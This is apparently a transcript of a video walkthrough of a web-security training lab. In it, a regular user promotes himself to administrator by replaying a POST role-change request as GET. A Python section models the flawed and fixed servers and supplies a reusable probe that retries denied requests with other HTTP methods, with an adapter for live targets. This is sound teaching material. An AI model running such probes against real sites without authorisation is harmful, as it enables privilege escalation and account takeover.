Broken Access Control - Lab #6 Method-based access control can be circumvented | Short Version

Method-Based Access Control can be Circumvented

This lab implements access controls based partly on the HTTP method of requests. To solve the lab, first familiarize yourself with the admin panel by logging in with the credentials administrator:admin. Then, logged in as the regular user you are given, exploit the flawed access controls to promote yourself to administrator.

The goal of this exercise is to exploit a broken access control vulnerability in order to promote the regular user we were given to an administrator. The way to achieve this is to first log in with the administrator account and learn how the functionality that promotes a user works, and then, once we understand that functionality, try to exploit it from our regular user account.

Accessing the Lab

While the lab loads, note that the browser being used is Burp's built-in browser. Therefore there is nothing to configure to send requests through Burp; it is done by default, and all of my requests should show up in the HTTP history tab. The first thing I am going to do is log in with the admin account and see how that functionality works: the username is administrator and the password is admin. Okay, so we are logged into the administrator account.

If we click on the admin panel, you can see that there is functionality to upgrade (promote) a user to an administrator, and you can also downgrade a user. Let's try upgrading the Carlos user rather than the regular account we were given, because I don't want to mess with our own account right now. Click upgrade on Carlos, and here we go: this is the request that is being performed. It is a POST request. Let's send it to Repeater and look at it.

The endpoint is /admin-roles, and the request body carries two parameters: the username of the target user and the action to perform. upgrade promotes the user, and I am guessing that clicking downgrade would send the same request with the action set to downgrade, returning the user to regular privileges. Again, note that this is a POST request.

How the Functionality Works

Now that we understand how it functions, let's log out and log in with the regular account we were given, then see whether there is an access control vulnerability that lets us promote our own user to an administrator. Click My account and log in with the account we were given (the password was peter), then hit login.

Notice that for our account we don't see an admin panel, because we don't have the privileges of an admin user. So let's look at My account. If we click on it, you can see that the URL carries the ID of the user as a parameter. Let's assume we have already tested this parameter and it is not vulnerable to any access control issue.

So what I am going to do is copy the session cookie of this regular user and replay the admin-roles request in Repeater using that cookie instead of the administrator's. Put it in, hit send, and here we go: it says Unauthorized. A user with regular privileges does not have the ability to promote a user to admin, which makes sense. But if the access control is implemented incorrectly, so that the authorization check is only applied to one method (say POST) while the same endpoint also accepts GET without that check, then we have a broken access control vulnerability.

To test for this potential vulnerability, right-click the request in Repeater and choose "Change request method". The request is now a GET, and the parameters have moved into the URL's query string. Change the username parameter to the account we are currently working with, since I want to promote my own user to admin, and hit send. We get a 302. Just the fact that we did not get an Unauthorized response is already a good sign, and if we follow the redirection it is a 200 OK, with the page reporting "Congratulations, you solved the lab". If we refresh the page we should now see the admin panel, because we have promoted ourselves to an admin user.
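The check above can be scripted so it is repeatable and so the same probe can be run against any endpoint that denies one HTTP method. The following is an added example, not the video's script: a probe that takes a request the server rejected as POST and replays it with other methods, plus a small in-memory model of the lab's flawed server (and a hardened variant) so the probe can be exercised offline. It goes slightly beyond the lab by also trying an unrecognised verb, which is a quick way to tell whether the server rejects the request before or after it dispatches on the method. Assumed names: the /admin-roles path, the username and action parameters, a cookie called session, constructed session tokens, and a regular user called wiener.

```python
"""Probe for method-based access control bypass, with an offline lab model.

Added example. The LabModel class, its session tokens and usernames are
constructed stand-ins for the lab; probe_method_bypass() is the reusable part.
"""

# Statuses that mean "the server refused this request" for probing purposes
BLOCKED = {401, 403, 404, 405}


class LabModel:
    """Constructed model of the role-change endpoint.

    strict=False: the admin check lives only in the POST handler, so a GET
    with the same parameters reaches the state change unchecked (the bug the
    lab demonstrates). strict=True: authorize on every method first, then
    accept only POST for the state change.
    """

    def __init__(self, strict=False):
        self.strict = strict
        self.roles = {"administrator": "admin", "wiener": "user", "carlos": "user"}
        self.sessions = {"adm-token": "administrator", "wnr-token": "wiener"}  # constructed

    def _caller_is_admin(self, cookies):
        user = self.sessions.get(cookies.get("session"))
        return self.roles.get(user) == "admin"

    def send(self, method, path, params, cookies):
        """Minimal transport: returns (status_code, body)."""
        if path != "/admin-roles":
            return 404, "Not Found"
        if self.strict:
            if not self._caller_is_admin(cookies):
                return 401, "Unauthorized"
            if method != "POST":
                return 405, "Method Not Allowed"
        else:
            # Flawed: only the POST branch checks the caller's role
            if method == "POST" and not self._caller_is_admin(cookies):
                return 401, "Unauthorized"
            if method not in ("GET", "POST"):
                return 405, "Method Not Allowed"
        username, action = params.get("username"), params.get("action")
        if username not in self.roles or action not in ("upgrade", "downgrade"):
            return 400, "Bad Request"
        self.roles[username] = "admin" if action == "upgrade" else "user"
        return 302, "/admin"


def probe_method_bypass(send, path, params, cookies,
                        methods=("GET", "HEAD", "PUT", "PATCH", "FOO")):
    """Replay a POST the server denied using alternative methods.

    `send(method, path, params, cookies)` must return (status_code, body).
    Returns {method: status} for every method that was not blocked. Run this
    against your own account or a harmless action: a successful probe performs
    the state change, exactly as the manual GET did in the lab.
    """
    baseline, _ = send("POST", path, params, cookies)
    if baseline not in BLOCKED:
        return {"POST": baseline}  # nothing to bypass, POST already works
    accepted = {}
    for method in methods:
        status, _ = send(method, path, params, cookies)
        if status not in BLOCKED:
            accepted[method] = status
    return accepted


def requests_transport(session, base_url):
    """Adapter so the probe can drive a real requests.Session against the live
    lab. Redirects are not followed, so a 302 is reported as-is."""
    def send(method, path, params, cookies):
        r = session.request(method, base_url + path, params=params,
                            cookies=cookies, allow_redirects=False)
        return r.status_code, r.text
    return send


if __name__ == "__main__":
    # Offline demonstration against the constructed model
    lab = LabModel()
    hit = probe_method_bypass(lab.send, "/admin-roles",
                              {"username": "wiener", "action": "upgrade"},
                              {"session": "wnr-token"})
    print("flawed server accepted:", hit, "-> wiener is now", lab.roles["wiener"])
    fixed = LabModel(strict=True)
    print("hardened server accepted:",
          probe_method_bypass(fixed.send, "/admin-roles",
                              {"username": "wiener", "action": "upgrade"},
                              {"session": "wnr-token"}))
```

Against the live lab you would replace the model with `requests_transport(requests.Session(), "https://<your-lab-id>.web-security-academy.net")` after logging in, passing your own session cookie; the probe then reports the same GET-with-302 result that Repeater showed. The hardened branch of the model is the fix to look for in a code review: the authorization check belongs to the route, before any method dispatch, and a state-changing endpoint should reject GET outright rather than silently treating it like POST.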

Conclusion

So we successfully completed the exercise by manually exploiting the broken access control vulnerability. Now let's script it in Python. If you would like to see the detailed version of this video, where we first exploit the vulnerability manually and then script it in Python, check out the video linked on the screen. Also make sure to hit the Subscribe button and check out my course if you are interested in more videos like this one. Thank you, and see you in the next video.
